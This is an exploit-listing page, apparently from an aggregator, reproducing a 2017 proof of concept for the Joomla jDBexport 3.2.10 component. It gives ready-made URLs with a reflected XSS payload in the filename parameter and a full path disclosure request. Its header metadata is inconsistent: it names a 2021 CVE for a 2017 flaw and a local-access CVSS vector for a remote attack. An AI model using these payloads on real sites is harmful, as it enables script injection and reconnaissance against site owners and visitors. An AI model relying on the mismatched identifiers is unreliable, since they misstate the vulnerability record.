Advertisement






Joomla jDBexport 3.2.10 Cross Site Scripting / Path Disclosure

CVE Category Price Severity
CVE-2021-3281 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-04-27
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017040183

Below is a copy:

Joomla jDBexport 3.2.10 Cross Site Scripting / Path Disclosure# Exploit Title: Joomla Component jDBexport 3.2.10 - Cross-site scripting / Full Path Disclosure
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Home : https://extensions.joomla.org/extensions/extension/core-enhancements/data-reports/jdbexport/
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: Linux
# Date: 2017-04-26
 
# POC :
# filename Parameter Vulnerable to Cross-site scripting :
https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=xls&filename=%3Cimg%20src=%221%22%20onerror=alert%28%22XSS%22%29%3E5d0eb34b31&debugcomponent=1

 
# Full Path Disclosure
https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=php&filename=[]&debugcomponent=1

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.